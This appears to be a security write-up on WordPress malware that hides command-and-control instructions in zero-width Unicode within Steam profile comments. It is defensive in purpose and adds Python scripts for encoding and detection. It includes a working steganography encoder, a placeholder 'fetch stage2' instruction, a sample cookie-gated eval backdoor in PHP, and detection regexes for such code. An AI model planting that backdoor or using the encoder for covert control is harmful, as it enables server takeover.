GoDaddy researchers discovered malware on roughly 1,980 WordPress sites that uses Valve's Steam platform as command-and-control (C2) infrastructure. The C2 instructions are hidden in Steam Community profile comments: the comment renders as harmless-looking ASCII art, while the actual instructions are encoded in invisible Unicode characters (zero-width code points that renderers do not draw) interleaved with the visible text. Because the dead drop sits on a legitimate, high-reputation domain, the retrieval traffic blends in with normal browsing and the operator can change instructions without touching the infected sites.
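The hiding technique described above, as an added example that is not code from the GoDaddy report or from the malware: a short instruction is turned into bits, each bit is carried by one zero-width character slotted between the visible characters of a small piece of ASCII art, and the receiver recovers it by keeping only the carrier characters. The bit-to-character mapping, the interleaving scheme, the cover art, the placeholder instruction and the detection threshold are all this example's own assumptions.

```python
"""Zero-width Unicode steganography in a text comment, plus a detector.

Added example. The mapping (U+200B = 0, U+200C = 1), the interleaving
and the threshold are assumptions, not details from the report.
"""

ZW0 = "\u200b"   # ZERO WIDTH SPACE       -> bit 0  (assumed mapping)
ZW1 = "\u200c"   # ZERO WIDTH NON-JOINER  -> bit 1  (assumed mapping)
# Code points that common renderers do not draw; used for detection below.
INVISIBLE = {ZW0, ZW1, "\u200d", "\u2060", "\ufeff"}


def encode_hidden(cover: str, secret: str) -> str:
    """Hide `secret` in `cover`: one carrier char after each visible char,
    any leftover carriers appended after the art."""
    bits = "".join(f"{byte:08b}" for byte in secret.encode("utf-8"))
    carriers = [ZW1 if bit == "1" else ZW0 for bit in bits]
    out = []
    for ch in cover:
        out.append(ch)
        if carriers:
            out.append(carriers.pop(0))
    out.extend(carriers)
    return "".join(out)


def decode_hidden(text: str) -> str:
    """Recover the secret: keep only the two carrier chars, regroup into bytes.
    Other invisible chars (e.g. ZWJ inside emoji) are ignored, so they cannot
    corrupt the decoded bit stream."""
    bits = "".join("1" if ch == ZW1 else "0" for ch in text if ch in (ZW0, ZW1))
    usable = len(bits) - len(bits) % 8
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    return data.decode("utf-8", errors="replace")


def visible_text(text: str) -> str:
    """What a person reading the profile comment actually sees."""
    return "".join(ch for ch in text if ch not in INVISIBLE)


def invisible_count(text: str) -> int:
    return sum(1 for ch in text if ch in INVISIBLE)


def is_suspicious(text: str, max_count: int = 8) -> bool:
    """Detection heuristic (assumed threshold): a handful of invisible code
    points is normal (emoji ZWJ sequences), hundreds is not."""
    return invisible_count(text) > max_count


# Constructed sample cover art and a made-up instruction; not real IOCs.
COVER = "\n".join([" /\\_/\\", "( o.o )", " > ^ <"])
SECRET = "cmd=fetch https://example.invalid/stage2.txt"

if __name__ == "__main__":
    comment = encode_hidden(COVER, SECRET)
    print(visible_text(comment))            # looks exactly like COVER
    print(decode_hidden(comment))           # the hidden instruction
    print(invisible_count(comment), is_suspicious(comment), is_suspicious(COVER))
```

Counting zero-width code points is the cheapest useful check: the cover art is only a couple of dozen characters, while a 44-byte instruction needs 352 carriers, so the ratio is hard to miss once you look at the raw bytes rather than the rendered comment.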
The malware injects code that masquerades as legitimate JavaScript libraries into WordPress sites and installs a PHP backdoor. The backdoor stays dormant until a request carries a specific authentication cookie value; when it does, the attacker can send PHP code that the backdoor executes on the server. Initial infections are most likely the result of stolen credentials or vulnerable plugins. Indicators of compromise include unexpected outbound connections from the web server to Steam URLs and PHP files with certain telltale characteristics. A complete cleanup is required: removing only the injected JavaScript, or only the file you happened to find, may leave the backdoor in place and let the attackers return. In practice that means removing every injected file and the backdoor itself, and rotating the credentials that may have been used for initial access.
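A small triage script for the two indicators named above (outbound requests to Steam URLs from the web tier, and PHP files whose code execution is gated on a cookie), as an added example that is not GoDaddy's tooling or the report's own detection rules. The log format, the regexes, the sample PHP files and the sample log lines are all constructed for illustration; the PHP sample is shaped like the behaviour described above, not the real malware.

```python
"""Heuristic triage for a suspected WordPress backdoor that uses Steam as C2.

Added example. Patterns, thresholds, the egress-log format and every sample
below are assumptions made for this illustration.
"""
import re

# Egress to the Steam Community host; captures the full URL up to whitespace.
STEAM_URL_RE = re.compile(r"https?://(?:[\w-]+\.)*steamcommunity\.com(?:/\S*)?", re.I)

# PHP primitives that turn data into code, decoders that usually feed them,
# and the cookie superglobal the text says gates the backdoor.
EVAL_RE = re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)
DECODE_RE = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)
COOKIE_RE = re.compile(r"\$_COOKIE\b")


def scan_php(source: str, window: int = 400) -> list:
    """Return the reasons a PHP source looks like a cookie-gated backdoor.
    `window` (assumed) is how close a $_COOKIE read must be to an eval-like
    call for the two to count as one gate."""
    reasons = []
    evals = [m.start() for m in EVAL_RE.finditer(source)]
    cookies = [m.start() for m in COOKIE_RE.finditer(source)]
    if any(abs(e - c) <= window for e in evals for c in cookies):
        reasons.append("cookie_gated_eval")
    if evals and DECODE_RE.search(source):
        reasons.append("decoder_feeding_eval")
    if STEAM_URL_RE.search(source):
        reasons.append("steam_url_in_php")
    return reasons


def steam_requests(log_lines) -> list:
    """Return (source_host, url) for egress-log lines that reach Steam.
    Assumed log layout: '<timestamp> <host> <process> <method> <url> <status>'."""
    hits = []
    for line in log_lines:
        m = STEAM_URL_RE.search(line)
        if m:
            hits.append((line.split()[1], m.group(0)))
    return hits


# Constructed sample: cookie-gated eval, the shape described in the text.
SUSPECT_PHP = r"""<?php
if (isset($_COOKIE['auth_key']) && $_COOKIE['auth_key'] === 'deadbeef') {
    eval(base64_decode($_POST['payload']));
}
"""

# Constructed sample: reads a cookie for a display preference, never executes it.
BENIGN_PHP = r"""<?php
$theme = isset($_COOKIE['theme']) ? sanitize_key($_COOKIE['theme']) : 'light';
echo esc_html($theme);
"""

# Constructed egress log lines; hosts, paths and timestamps are made up.
EGRESS_LOG = """\
2025-03-01T10:00:01Z web-01 php-fpm GET https://api.wordpress.org/plugins/info/1.2/ 200
2025-03-01T10:00:07Z web-01 php-fpm GET https://steamcommunity.com/id/example-profile/ 200
2025-03-01T10:05:07Z web-02 php-fpm GET https://steamcommunity.com/id/example-profile/ 200
2025-03-01T10:06:00Z web-02 cron GET https://downloads.wordpress.org/release/wordpress-6.7.zip 200
""".splitlines()

if __name__ == "__main__":
    print("suspect:", scan_php(SUSPECT_PHP))
    print("benign: ", scan_php(BENIGN_PHP))
    for host, url in steam_requests(EGRESS_LOG):
        print(f"{host} -> {url}")
```

Both checks are heuristics meant to shortlist files and hosts for a human, not to judge them: `assert(` also appears in legitimate test code, and a web server has no business talking to Steam, but a developer box running a Steam-related plugin might. Treat a hit on either signal as a reason to pull the file and the surrounding request logs, then clean the whole site rather than the one file that tripped the rule.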